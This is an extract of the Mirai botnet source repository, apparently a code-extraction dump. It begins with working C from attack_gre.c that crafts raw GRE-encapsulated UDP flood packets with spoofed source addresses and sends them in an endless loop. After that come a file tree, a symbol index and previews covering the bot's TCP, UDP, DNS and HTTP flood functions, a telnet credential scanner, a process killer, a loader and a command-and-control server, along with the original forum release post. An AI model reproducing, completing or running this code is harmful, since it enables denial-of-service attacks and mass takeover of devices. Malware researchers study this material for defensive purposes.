uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
{
#ifdef DEBUG
printf("Failed to create raw socket. Aborting attack\n");
#endif
return;
}
i = 1;
if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
{
#ifdef DEBUG
printf("Failed to set IP_HDRINCL. Aborting\n");
#endif
close(fd);
return;
}
for (i = 0; i < targs_len; i++)
{
struct iphdr *iph;
struct grehdr *greh;
struct iphdr *greiph;
struct udphdr *udph;
pkts[i] = calloc(1510, sizeof (char *));
iph = (struct iphdr *)(pkts[i]);
greh = (struct grehdr *)(iph + 1);
greiph = (struct iphdr *)(greh + 1);
udph = (struct udphdr *)(greiph + 1);
// IP header init
iph->version = 4;
iph->ihl = 5;
iph->tos = ip_tos;
iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
iph->id = htons(ip_ident);
iph->ttl = ip_ttl;
if (dont_frag)
iph->frag_off = htons(1 << 14);
iph->protocol = IPPROTO_GRE;
iph->saddr = source_ip;
iph->daddr = targs[i].addr;
// GRE header init
greh->protocol = htons(ETH_P_IP); // Protocol is 2 bytes
// Encapsulated IP header init
greiph->version = 4;
greiph->ihl = 5;
greiph->tos = ip_tos;
greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
greiph->id = htons(~ip_ident);
greiph->ttl = ip_ttl;
if (dont_frag)
greiph->frag_off = htons(1 << 14);
greiph->protocol = IPPROTO_UDP;
greiph->saddr = rand_next();
if (gcip)
greiph->daddr = iph->daddr;
else
greiph->daddr = ~(greiph->saddr - 1024);
// UDP header init
udph->source = htons(sport);
udph->dest = htons(dport);
udph->len = htons(sizeof (struct udphdr) + data_len);
}
while (TRUE)
{
for (i = 0; i < targs_len; i++)
{
char *pkt = pkts[i];
struct iphdr *iph = (struct iphdr *)pkt;
struct grehdr *greh = (struct grehdr *)(iph + 1);
struct iphdr *greiph = (struct iphdr *)(greh + 1);
struct udphdr *udph = (struct udphdr *)(greiph + 1);
char *data = (char *)(udph + 1);
// For prefix attacks
if (targs[i].netmask < 32)
iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
if (source_ip == 0xffffffff)
iph->saddr = rand_next();
if (ip_ident == 0xffff)
{
gitextract_oqbw3e49/
├── ForumPost.md
├── ForumPost.txt
├── LICENSE.md
├── README.md
├── dlr/
│ ├── build.sh
│ ├── main.c
│ └── release/
│ ├── dlr.arm
│ ├── dlr.arm7
│ ├── dlr.m68k
│ ├── dlr.mips
│ ├── dlr.mpsl
│ ├── dlr.ppc
│ ├── dlr.sh4
│ └── dlr.spc
├── loader/
│ ├── bins/
│ │ ├── dlr.arm
│ │ ├── dlr.arm7
│ │ ├── dlr.m68k
│ │ ├── dlr.mips
│ │ ├── dlr.mpsl
│ │ ├── dlr.ppc
│ │ ├── dlr.sh4
│ │ ├── dlr.spc
│ │ └── dlr.x86
│ ├── build.debug.sh
│ ├── build.sh
│ └── src/
│ ├── binary.c
│ ├── connection.c
│ ├── headers/
│ │ ├── binary.h
│ │ ├── connection.h
│ │ ├── includes.h
│ │ ├── server.h
│ │ ├── telnet_info.h
│ │ └── util.h
│ ├── main.c
│ ├── server.c
│ ├── telnet_info.c
│ └── util.c
├── mirai/
│ ├── bot/
│ │ ├── attack.c
│ │ ├── attack.h
│ │ ├── attack_app.c
│ │ ├── attack_gre.c
│ │ ├── attack_tcp.c
│ │ ├── attack_udp.c
│ │ ├── checksum.c
│ │ ├── checksum.h
│ │ ├── includes.h
│ │ ├── killer.c
│ │ ├── killer.h
│ │ ├── main.c
│ │ ├── protocol.h
│ │ ├── rand.c
│ │ ├── rand.h
│ │ ├── resolv.c
│ │ ├── resolv.h
│ │ ├── scanner.c
│ │ ├── scanner.h
│ │ ├── table.c
│ │ ├── table.h
│ │ ├── util.c
│ │ └── util.h
│ ├── build.sh
│ ├── cnc/
│ │ ├── admin.go
│ │ ├── api.go
│ │ ├── attack.go
│ │ ├── bot.go
│ │ ├── clientList.go
│ │ ├── constants.go
│ │ ├── database.go
│ │ └── main.go
│ ├── prompt.txt
│ └── tools/
│ ├── badbot.c
│ ├── enc.c
│ ├── nogdb.c
│ ├── scanListen.go
│ ├── single_load.c
│ └── wget.c
└── scripts/
├── cross-compile.sh
└── db.sql
SYMBOL INDEX (379 symbols across 48 files)
FILE: dlr/main.c
type sockaddr_in (line 47) | struct sockaddr_in
function __start (line 70) | void __start(void)
function run (line 86) | inline void run(void)
function sstrlen (line 173) | int sstrlen(char *str)
function utils_inet_addr (line 182) | unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsig...
function xsocket (line 193) | int xsocket(int domain, int type, int protocol)
function xread (line 221) | int xread(int fd, void *buf, int len)
function xwrite (line 226) | int xwrite(int fd, void *buf, int len)
function xconnect (line 231) | int xconnect(int fd, struct sockaddr_in *addr, int len)
function xopen (line 261) | int xopen(char *path, int flags, int other)
function xclose (line 266) | int xclose(int fd)
function x__exit (line 271) | void x__exit(int code)
FILE: loader/src/binary.c
type binary (line 9) | struct binary
function BOOL (line 11) | BOOL binary_init(void)
type binary (line 44) | struct binary
function BOOL (line 57) | static BOOL load(struct binary *bin, char *fname)
FILE: loader/src/connection.c
function connection_open (line 13) | void connection_open(struct connection *conn)
function connection_close (line 33) | void connection_close(struct connection *conn)
function connection_consume_iacs (line 87) | int connection_consume_iacs(struct connection *conn)
function connection_consume_login_prompt (line 149) | int connection_consume_login_prompt(struct connection *conn)
function connection_consume_password_prompt (line 182) | int connection_consume_password_prompt(struct connection *conn)
function connection_consume_prompt (line 213) | int connection_consume_prompt(struct connection *conn)
function connection_consume_verify_login (line 236) | int connection_consume_verify_login(struct connection *conn)
function connection_consume_psoutput (line 246) | int connection_consume_psoutput(struct connection *conn)
function connection_consume_mounts (line 351) | int connection_consume_mounts(struct connection *conn)
function connection_consume_written_dirs (line 414) | int connection_consume_written_dirs(struct connection *conn)
function connection_consume_copy_op (line 456) | int connection_consume_copy_op(struct connection *conn)
function connection_consume_arch (line 465) | int connection_consume_arch(struct connection *conn)
function connection_consume_arm_subtype (line 538) | int connection_consume_arm_subtype(struct connection *conn)
function connection_consume_upload_methods (line 556) | int connection_consume_upload_methods(struct connection *conn)
function connection_upload_echo (line 573) | int connection_upload_echo(struct connection *conn)
function connection_upload_wget (line 601) | int connection_upload_wget(struct connection *conn)
function connection_upload_tftp (line 611) | int connection_upload_tftp(struct connection *conn)
function connection_verify_payload (line 630) | int connection_verify_payload(struct connection *conn)
function connection_consume_cleanup (line 643) | int connection_consume_cleanup(struct connection *conn)
function BOOL (line 652) | static BOOL can_consume(struct connection *conn, uint8_t *ptr, int amount)
FILE: loader/src/headers/binary.h
type binary (line 7) | struct binary {
type binary (line 14) | struct binary
type binary (line 16) | struct binary
FILE: loader/src/headers/connection.h
type connection (line 8) | struct connection {
type connection (line 46) | struct connection
type connection (line 47) | struct connection
type connection (line 49) | struct connection
type connection (line 50) | struct connection
type connection (line 51) | struct connection
type connection (line 52) | struct connection
type connection (line 53) | struct connection
type connection (line 54) | struct connection
type connection (line 55) | struct connection
type connection (line 56) | struct connection
type connection (line 57) | struct connection
type connection (line 58) | struct connection
type connection (line 59) | struct connection
type connection (line 60) | struct connection
type connection (line 61) | struct connection
type connection (line 62) | struct connection
type connection (line 63) | struct connection
type connection (line 64) | struct connection
type connection (line 65) | struct connection
type connection (line 67) | struct connection
FILE: loader/src/headers/includes.h
type BOOL (line 11) | typedef char BOOL;
type ipv4_t (line 13) | typedef uint32_t ipv4_t;
type port_t (line 14) | typedef uint16_t port_t;
FILE: loader/src/headers/server.h
type server (line 8) | struct server {
type server_worker (line 22) | struct server_worker {
type server (line 29) | struct server
type server (line 30) | struct server
type server (line 31) | struct server
type telnet_info (line 31) | struct telnet_info
type server (line 32) | struct server
type telnet_info (line 32) | struct telnet_info
type server_worker (line 36) | struct server_worker
type server_worker (line 37) | struct server_worker
type epoll_event (line 37) | struct epoll_event
FILE: loader/src/headers/telnet_info.h
type telnet_info (line 5) | struct telnet_info {
type telnet_info (line 17) | struct telnet_info
type telnet_info (line 17) | struct telnet_info
type telnet_info (line 18) | struct telnet_info
type telnet_info (line 18) | struct telnet_info
FILE: loader/src/headers/util.h
type elf_hdr (line 63) | struct elf_hdr {
type server (line 69) | struct server
FILE: loader/src/main.c
type server (line 17) | struct server
function main (line 21) | int main(int argc, char **args)
FILE: loader/src/server.c
type server (line 19) | struct server
type server (line 21) | struct server
type server (line 21) | struct server
type server_worker (line 22) | struct server_worker
type server_worker (line 22) | struct server_worker
type connection (line 32) | struct connection
type server_worker (line 33) | struct server_worker
type connection (line 45) | struct connection
type server_worker (line 57) | struct server_worker
function server_destroy (line 78) | void server_destroy(struct server *srv)
function server_queue_telnet (line 89) | void server_queue_telnet(struct server *srv, struct telnet_info *info)
function server_telnet_probe (line 103) | void server_telnet_probe(struct server *srv, struct telnet_info *info)
function bind_core (line 155) | static void bind_core(int core)
type server_worker (line 167) | struct server_worker
type server_worker (line 167) | struct server_worker
type epoll_event (line 168) | struct epoll_event
function handle_event (line 184) | static void handle_event(struct server_worker *wrker, struct epoll_event...
type server (line 599) | struct server
type server (line 599) | struct server
type connection (line 608) | struct connection
FILE: loader/src/telnet_info.c
type telnet_info (line 8) | struct telnet_info
type telnet_info (line 8) | struct telnet_info
type telnet_info (line 25) | struct telnet_info
type telnet_info (line 25) | struct telnet_info
FILE: loader/src/util.c
function hexDump (line 12) | void hexDump (char *desc, void *addr, int len) {
function util_socket_and_bind (line 64) | int util_socket_and_bind(struct server *srv)
function util_memsearch (line 111) | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len)
function BOOL (line 132) | BOOL util_sockprintf(int fd, const char *fmt, ...)
FILE: mirai/bot/attack.c
type attack_method (line 19) | struct attack_method
function BOOL (line 22) | BOOL attack_init(void)
function attack_kill_all (line 44) | void attack_kill_all(void)
function attack_parse (line 64) | void attack_parse(char *buf, int len)
function attack_start (line 155) | void attack_start(int duration, ATTACK_VECTOR vector, uint8_t targs_len,...
type attack_option (line 193) | struct attack_option
function attack_get_opt_int (line 206) | int attack_get_opt_int(uint8_t opts_len, struct attack_option *opts, uin...
function attack_get_opt_ip (line 216) | uint32_t attack_get_opt_ip(uint8_t opts_len, struct attack_option *opts,...
function add_attack (line 226) | static void add_attack(ATTACK_VECTOR vector, ATTACK_FUNC func)
function free_opts (line 237) | static void free_opts(struct attack_option *opts, int len)
FILE: mirai/bot/attack.h
type attack_target (line 20) | struct attack_target {
type attack_option (line 26) | struct attack_option {
type attack_target (line 31) | struct attack_target
type attack_option (line 31) | struct attack_option
type ATTACK_VECTOR (line 32) | typedef uint8_t ATTACK_VECTOR;
type attack_method (line 73) | struct attack_method {
type attack_stomp_data (line 78) | struct attack_stomp_data {
type attack_http_state (line 108) | struct attack_http_state {
type attack_cfnull_state (line 134) | struct attack_cfnull_state {
type attack_target (line 148) | struct attack_target
type attack_option (line 148) | struct attack_option
type attack_option (line 149) | struct attack_option
type attack_option (line 150) | struct attack_option
type attack_option (line 151) | struct attack_option
type attack_target (line 154) | struct attack_target
type attack_option (line 154) | struct attack_option
type attack_target (line 155) | struct attack_target
type attack_option (line 155) | struct attack_option
type attack_target (line 156) | struct attack_target
type attack_option (line 156) | struct attack_option
type attack_target (line 157) | struct attack_target
type attack_option (line 157) | struct attack_option
type attack_target (line 159) | struct attack_target
type attack_option (line 159) | struct attack_option
type attack_target (line 160) | struct attack_target
type attack_option (line 160) | struct attack_option
type attack_target (line 161) | struct attack_target
type attack_option (line 161) | struct attack_option
type attack_target (line 163) | struct attack_target
type attack_option (line 163) | struct attack_option
type attack_target (line 164) | struct attack_target
type attack_option (line 164) | struct attack_option
type attack_target (line 166) | struct attack_target
type attack_option (line 166) | struct attack_option
type attack_target (line 167) | struct attack_target
type attack_option (line 167) | struct attack_option
type attack_option (line 170) | struct attack_option
FILE: mirai/bot/attack_app.c
function attack_app_proxy (line 20) | void attack_app_proxy(uint8_t targs_len, struct attack_target *targs, ui...
function attack_app_http (line 26) | void attack_app_http(uint8_t targs_len, struct attack_target *targs, uin...
function attack_app_cfnull (line 855) | void attack_app_cfnull(uint8_t targs_len, struct attack_target *targs, u...
FILE: mirai/bot/attack_gre.c
function attack_gre_ip (line 20) | void attack_gre_ip(uint8_t targs_len, struct attack_target *targs, uint8...
function attack_gre_eth (line 162) | void attack_gre_eth(uint8_t targs_len, struct attack_target *targs, uint...
FILE: mirai/bot/attack_tcp.c
function attack_tcp_syn (line 18) | void attack_tcp_syn(uint8_t targs_len, struct attack_target *targs, uint...
function attack_tcp_ack (line 161) | void attack_tcp_ack(uint8_t targs_len, struct attack_target *targs, uint...
function attack_tcp_stomp (line 293) | void attack_tcp_stomp(uint8_t targs_len, struct attack_target *targs, ui...
FILE: mirai/bot/attack_udp.c
function attack_udp_generic (line 25) | void attack_udp_generic(uint8_t targs_len, struct attack_target *targs, ...
function attack_udp_vse (line 129) | void attack_udp_vse(uint8_t targs_len, struct attack_target *targs, uint...
function attack_udp_dns (line 230) | void attack_udp_dns(uint8_t targs_len, struct attack_target *targs, uint...
function attack_udp_plain (line 375) | void attack_udp_plain(uint8_t targs_len, struct attack_target *targs, ui...
function ipv4_t (line 479) | static ipv4_t get_dns_resolver(void)
FILE: mirai/bot/checksum.c
function checksum_generic (line 9) | uint16_t checksum_generic(uint16_t *addr, uint32_t count)
function checksum_tcpudp (line 24) | uint16_t checksum_tcpudp(struct iphdr *iph, void *buff, uint16_t data_le...
FILE: mirai/bot/checksum.h
type iphdr (line 9) | struct iphdr
FILE: mirai/bot/includes.h
type BOOL (line 13) | typedef char BOOL;
type ipv4_t (line 15) | typedef uint32_t ipv4_t;
type port_t (line 16) | typedef uint16_t port_t;
function xputc (line 35) | static void xputc(char c)
function xputs (line 45) | static void xputs(const char *str)
function xvprintf (line 51) | static void xvprintf(const char *fmt, va_list arp)
function xprintf (line 123) | static void xprintf(const char *fmt, ...)
FILE: mirai/bot/killer.c
function killer_init (line 25) | void killer_init(void)
function killer_kill (line 248) | void killer_kill(void)
function BOOL (line 253) | BOOL killer_kill_by_port(port_t port)
function BOOL (line 421) | static BOOL has_exe_access(void)
function BOOL (line 494) | static BOOL memory_scan_match(char *path)
function BOOL (line 541) | static BOOL mem_exists(char *buf, int buf_len, char *str, int str_len)
FILE: mirai/bot/main.c
type sockaddr_in (line 34) | struct sockaddr_in
function segv_handler (line 40) | static void segv_handler(int sig, siginfo_t *si, void *unused)
function main (line 47) | int main(int argc, char **args)
function anti_gdb_entry (line 353) | static void anti_gdb_entry(int sig)
function resolve_cnc_addr (line 358) | static void resolve_cnc_addr(void)
function establish_connection (line 384) | static void establish_connection(void)
function teardown_connection (line 408) | static void teardown_connection(void)
function ensure_single_instance (line 420) | static void ensure_single_instance(void)
function BOOL (line 480) | static BOOL unlock_tbl_if_nodebug(char *argv0)
FILE: mirai/bot/protocol.h
type dnshdr (line 7) | struct dnshdr {
type dns_question (line 11) | struct dns_question {
type dns_resource (line 15) | struct dns_resource {
type grehdr (line 21) | struct grehdr {
FILE: mirai/bot/rand.c
function rand_init (line 13) | void rand_init(void)
function rand_next (line 21) | uint32_t rand_next(void) //period 2^96-1
function rand_str (line 32) | void rand_str(char *str, int len) // Generate random buffer (not alphanu...
function rand_alphastr (line 56) | void rand_alphastr(uint8_t *str, int len) // Random alphanumeric string,...
FILE: mirai/bot/resolv.c
function resolv_domain_to_hostname (line 21) | void resolv_domain_to_hostname(char *dst_hostname, char *src_domain)
function resolv_skip_name (line 46) | static void resolv_skip_name(uint8_t *reader, uint8_t *buffer, int *count)
type resolv_entries (line 67) | struct resolv_entries
type resolv_entries (line 69) | struct resolv_entries
type resolv_entries (line 69) | struct resolv_entries
type dnshdr (line 71) | struct dnshdr
type dnshdr (line 71) | struct dnshdr
type dns_question (line 76) | struct dns_question
type dns_question (line 76) | struct dns_question
type sockaddr_in (line 77) | struct sockaddr_in
type dnshdr (line 78) | struct dnshdr
type dns_question (line 78) | struct dns_question
type sockaddr_in (line 82) | struct sockaddr_in
type timeval (line 97) | struct timeval
type sockaddr (line 111) | struct sockaddr
type sockaddr_in (line 111) | struct sockaddr_in
type dnsans (line 158) | struct dnsans
type dnshdr (line 162) | struct dnshdr
type dns_question (line 162) | struct dns_question
type dnshdr (line 165) | struct dnshdr
type dns_question (line 167) | struct dns_question
type dns_resource (line 178) | struct dns_resource
type dns_resource (line 183) | struct dns_resource
type dns_resource (line 184) | struct dns_resource
function resolv_entries_free (line 230) | void resolv_entries_free(struct resolv_entries *entries)
FILE: mirai/bot/resolv.h
type resolv_entries (line 5) | struct resolv_entries {
type resolv_entries (line 11) | struct resolv_entries
type resolv_entries (line 12) | struct resolv_entries
FILE: mirai/bot/scanner.c
type iphdr (line 31) | struct iphdr
type tcphdr (line 31) | struct tcphdr
type scanner_auth (line 32) | struct scanner_auth
type scanner_connection (line 33) | struct scanner_connection
function recv_strip_null (line 37) | int recv_strip_null(int sock, void *buf, int len, int flags)
function scanner_init (line 57) | void scanner_init(void)
function scanner_kill (line 641) | void scanner_kill(void)
function setup_connection (line 646) | static void setup_connection(struct scanner_connection *conn)
function ipv4_t (line 674) | static ipv4_t get_random_ip(void)
function consume_iacs (line 706) | static int consume_iacs(struct scanner_connection *conn)
function consume_any_prompt (line 768) | static int consume_any_prompt(struct scanner_connection *conn)
function consume_user_prompt (line 788) | static int consume_user_prompt(struct scanner_connection *conn)
function consume_pass_prompt (line 818) | static int consume_pass_prompt(struct scanner_connection *conn)
function consume_resp_prompt (line 846) | static int consume_resp_prompt(struct scanner_connection *conn)
function add_auth_entry (line 871) | static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
type scanner_auth (line 885) | struct scanner_auth
function report_working (line 901) | static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_...
function BOOL (line 984) | static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, i...
FILE: mirai/bot/scanner.h
type scanner_auth (line 18) | struct scanner_auth {
type scanner_connection (line 25) | struct scanner_connection {
type scanner_connection (line 51) | struct scanner_connection
type scanner_connection (line 54) | struct scanner_connection
type scanner_connection (line 55) | struct scanner_connection
type scanner_connection (line 56) | struct scanner_connection
type scanner_connection (line 57) | struct scanner_connection
type scanner_connection (line 58) | struct scanner_connection
type scanner_auth (line 61) | struct scanner_auth
type scanner_auth (line 62) | struct scanner_auth
type scanner_connection (line 64) | struct scanner_connection
FILE: mirai/bot/table.c
type table_value (line 14) | struct table_value
function table_init (line 16) | void table_init(void)
function table_unlock_val (line 78) | void table_unlock_val(uint8_t id)
function table_lock_val (line 93) | void table_lock_val(uint8_t id)
type table_value (line 110) | struct table_value
function add_entry (line 125) | static void add_entry(uint8_t id, char *buf, int buf_len)
function toggle_obf (line 138) | static void toggle_obf(uint8_t id)
FILE: mirai/bot/table.h
type table_value (line 6) | struct table_value {
FILE: mirai/bot/util.c
function util_strlen (line 21) | int util_strlen(char *str)
function BOOL (line 31) | BOOL util_strncmp(char *str1, char *str2, int len)
function BOOL (line 47) | BOOL util_strcmp(char *str1, char *str2)
function util_strcpy (line 63) | int util_strcpy(char *dst, char *src)
function util_memcpy (line 72) | void util_memcpy(void *dst, void *src, int len)
function util_zero (line 80) | void util_zero(void *buf, int len)
function util_atoi (line 87) | int util_atoi(char *str, int base)
function util_memsearch (line 188) | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len)
function util_stristr (line 209) | int util_stristr(char *haystack, int haystack_len, char *str)
function ipv4_t (line 234) | ipv4_t util_local_addr(void)
function util_isupper (line 273) | static inline int util_isupper(char c)
function util_isalpha (line 278) | static inline int util_isalpha(char c)
function util_isspace (line 283) | static inline int util_isspace(char c)
function util_isdigit (line 288) | static inline int util_isdigit(char c)
FILE: mirai/cnc/admin.go
type Admin (line 12) | type Admin struct
method Handle (line 20) | func (this *Admin) Handle() {
method ReadLine (line 224) | func (this *Admin) ReadLine(masked bool) (string, error) {
function NewAdmin (line 16) | func NewAdmin(conn net.Conn) *Admin {
FILE: mirai/cnc/api.go
type Api (line 10) | type Api struct
method Handle (line 18) | func (this *Api) Handle() {
method ReadLine (line 75) | func (this *Api) ReadLine() (string, error) {
function NewApi (line 14) | func NewApi(conn net.Conn) *Api {
FILE: mirai/cnc/attack.go
type AttackInfo (line 13) | type AttackInfo struct
type Attack (line 19) | type Attack struct
method Build (line 318) | func (this *Attack) Build() ([]byte, error) {
type FlagInfo (line 26) | type FlagInfo struct
function uint8InSlice (line 188) | func uint8InSlice(a uint8, list []uint8) bool {
function NewAttack (line 197) | func NewAttack(str string, admin int) (*Attack, error) {
FILE: mirai/cnc/bot.go
type Bot (line 8) | type Bot struct
method Handle (line 19) | func (this *Bot) Handle() {
method QueueBuf (line 35) | func (this *Bot) QueueBuf(buf []byte) {
function NewBot (line 15) | func NewBot(conn net.Conn, version byte, source string) *Bot {
FILE: mirai/cnc/clientList.go
type AttackSend (line 10) | type AttackSend struct
type ClientList (line 16) | type ClientList struct
method Count (line 37) | func (this *ClientList) Count() int {
method Distribution (line 45) | func (this *ClientList) Distribution() map[string]int {
method AddClient (line 52) | func (this *ClientList) AddClient(c *Bot) {
method DelClient (line 56) | func (this *ClientList) DelClient(c *Bot) {
method QueueBuf (line 61) | func (this *ClientList) QueueBuf(buf []byte, maxbots int, botCata stri...
method fastCountWorker (line 66) | func (this *ClientList) fastCountWorker() {
method worker (line 79) | func (this *ClientList) worker() {
function NewClientList (line 30) | func NewClientList() *ClientList {
FILE: mirai/cnc/constants.go
constant MiraiPrompt (line 3) | MiraiPrompt = `
FILE: mirai/cnc/database.go
type Database (line 13) | type Database struct
method TryLogin (line 32) | func (this *Database) TryLogin(username string, password string) (bool...
method CreateUser (line 47) | func (this *Database) CreateUser(username string, password string, max...
method ContainsWhitelistedTargets (line 60) | func (this *Database) ContainsWhitelistedTargets(attack *Attack) bool {
method CanLaunchAttack (line 99) | func (this *Database) CanLaunchAttack(username string, duration uint32...
method CheckApiCode (line 132) | func (this *Database) CheckApiCode(apikey string) (bool, AccountInfo) {
type AccountInfo (line 17) | type AccountInfo struct
function NewDatabase (line 23) | func NewDatabase(dbAddr string, dbUser string, dbPassword string, dbName...
FILE: mirai/cnc/main.go
constant DatabaseAddr (line 10) | DatabaseAddr string = "127.0.0.1"
constant DatabaseUser (line 11) | DatabaseUser string = "root"
constant DatabasePass (line 12) | DatabasePass string = "password"
constant DatabaseTable (line 13) | DatabaseTable string = "mirai"
function main (line 18) | func main() {
function initialHandler (line 52) | func initialHandler(conn net.Conn) {
function apiHandler (line 88) | func apiHandler(conn net.Conn) {
function readXBytes (line 94) | func readXBytes(conn net.Conn, buf []byte) (error) {
function netshift (line 111) | func netshift(prefix uint32, netmask uint8) uint32 {
FILE: mirai/tools/badbot.c
function main (line 4) | int main(int argc, char **args)
FILE: mirai/tools/enc.c
function main (line 11) | int main(int argc, char **args)
FILE: mirai/tools/nogdb.c
function main (line 11) | int main(int argc, char** argv) {
FILE: mirai/tools/scanListen.go
function main (line 11) | func main() {
function handleConnection (line 27) | func handleConnection(conn net.Conn) {
function readXBytes (line 82) | func readXBytes(conn net.Conn, amount int) ([]byte, error) {
FILE: mirai/tools/single_load.c
type stateSlot_t (line 56) | struct stateSlot_t
type stateSlot_t (line 91) | struct stateSlot_t
function diff (line 95) | static int diff(int val)
function matchPrompt (line 100) | int matchPrompt(char *bufStr)
function hexDump (line 141) | void hexDump(char *desc, void *addr, int len)
function log_recv (line 166) | int log_recv(int sock, void *buf, int len, int flags)
function log_send (line 194) | int log_send(int sock, void *buf, int len, int flags)
function sockprintf (line 206) | int sockprintf(int sock, char *formatStr, ...)
function handle_remote_closed (line 240) | void handle_remote_closed(int fd)
function handle_timeout (line 245) | void handle_timeout(int fd)
function handle_failed_connect (line 250) | void handle_failed_connect(int fd)
function handle_found (line 255) | void handle_found(int fd)
function closeAndCleanup (line 285) | void closeAndCleanup(int fd)
function updateAccessTime (line 318) | void updateAccessTime(int fd)
function getConnectedSockets (line 326) | int getConnectedSockets()
type epoll_event (line 340) | struct epoll_event
type stateSlot_t (line 349) | struct stateSlot_t
type stateSlot_t (line 358) | struct stateSlot_t
type epoll_event (line 713) | struct epoll_event
type stateSlot_t (line 720) | struct stateSlot_t
function sighandler (line 748) | void sighandler(int sig)
function chomp (line 754) | void chomp(char *s)
type sockaddr_in (line 792) | struct sockaddr_in
type sockaddr_in (line 793) | struct sockaddr_in
type sockaddr_in (line 799) | struct sockaddr_in
type sockaddr_in (line 817) | struct sockaddr_in
type sockaddr (line 822) | struct sockaddr
type sockaddr (line 827) | struct sockaddr
type epoll_event (line 854) | struct epoll_event
function load_binary (line 887) | int load_binary(char *path)
function main (line 929) | int main(int argc, char *argv[ ])
FILE: mirai/tools/wget.c
type sockaddr_in (line 42) | struct sockaddr_in
function xprintf (line 56) | void xprintf(char *str)
function main (line 64) | int main(int argc, char **args)
function xsocket (line 128) | int xsocket(int domain, int type, int protocol)
function xread (line 143) | int xread(int fd, void *buf, int len)
function xwrite (line 148) | int xwrite(int fd, void *buf, int len)
function xconnect (line 153) | int xconnect(int fd, struct sockaddr_in *addr, int len)
function xopen (line 170) | int xopen(char *path, int flags, int other)
function xclose (line 175) | int xclose(int fd)
function x__exit (line 180) | void x__exit(int code)
FILE: scripts/db.sql
type `history` (line 3) | CREATE TABLE `history` (
type `users` (line 14) | CREATE TABLE `users` (
type `whitelist` (line 30) | CREATE TABLE `whitelist` (
Condensed preview — 78 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (452K chars).
[
{
"path": "ForumPost.md",
"chars": 9607,
"preview": "* Original quote from: [Anna-senpai](https://hackforums.net/showthread.php?tid=5420472)\n* Date posted: Fri 30 Sep 19:50:"
},
{
"path": "ForumPost.txt",
"chars": 9544,
"preview": "[FREE] World's Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release - Anna-senpai - 09-30-2016 11:50 A"
},
{
"path": "LICENSE.md",
"chars": 35141,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "README.md",
"chars": 5334,
"preview": "# Mirai Source Code\n---\n\n## 🔧 Requirements\n\nBefore building and running this code, ensure you have the following install"
},
{
"path": "dlr/build.sh",
"chars": 5000,
"preview": "armv4l-gcc -Os -D BOT_ARCH=\\\"arm\\\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles"
},
{
"path": "dlr/main.c",
"chars": 5622,
"preview": "#include <sys/types.h>\n//#include <bits/syscalls.h>\n#include <sys/syscall.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n"
},
{
"path": "loader/build.debug.sh",
"chars": 89,
"preview": "#!/bin/bash\ngcc -lefence -g -DDEBUG -static -lpthread -pthread -O3 src/*.c -o loader.dbg\n"
},
{
"path": "loader/build.sh",
"chars": 65,
"preview": "#!/bin/bash\ngcc -static -O3 -lpthread -pthread src/*.c -o loader\n"
},
{
"path": "loader/src/binary.c",
"chars": 1989,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <glob.h>\n#include \"headers/includes.h\"\n#include \"hea"
},
{
"path": "loader/src/connection.c",
"chars": 18919,
"preview": "#include <sys/socket.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <time.h>\n#include <pthread.h"
},
{
"path": "loader/src/headers/binary.h",
"chars": 290,
"preview": "#pragma once\n\n#include \"includes.h\"\n\n#define BINARY_BYTES_PER_ECHOLINE 128\n\nstruct binary {\n char arch[6];\n int "
},
{
"path": "loader/src/headers/connection.h",
"chars": 2400,
"preview": "#pragma once\n\n#include <time.h>\n#include <pthread.h>\n#include \"includes.h\"\n#include \"telnet_info.h\"\n\nstruct connection {"
},
{
"path": "loader/src/headers/includes.h",
"chars": 830,
"preview": "#pragma once\n\n#include <stdint.h>\n\n#define STDIN 0\n#define STDOUT 1\n#define STDERR 2\n\n#define FALSE 0\n#define TRUE"
},
{
"path": "loader/src/headers/server.h",
"chars": 1317,
"preview": "#pragma once\n\n#include <sys/epoll.h>\n#include \"includes.h\"\n#include \"telnet_info.h\"\n#include \"connection.h\"\n\nstruct serv"
},
{
"path": "loader/src/headers/telnet_info.h",
"chars": 471,
"preview": "#pragma once\n\n#include \"includes.h\"\n\nstruct telnet_info {\n char user[32], pass[32], arch[6], writedir[32];\n ipv4_t"
},
{
"path": "loader/src/headers/util.h",
"chars": 2902,
"preview": "#pragma once\n\n#include \"server.h\"\n#include \"includes.h\"\n\n#define BUFFER_SIZE 4096\n\n#define EI_NIDENT 16 // Side of e_i"
},
{
"path": "loader/src/main.c",
"chars": 2858,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <unistd.h>\n#include <pthread.h>\n"
},
{
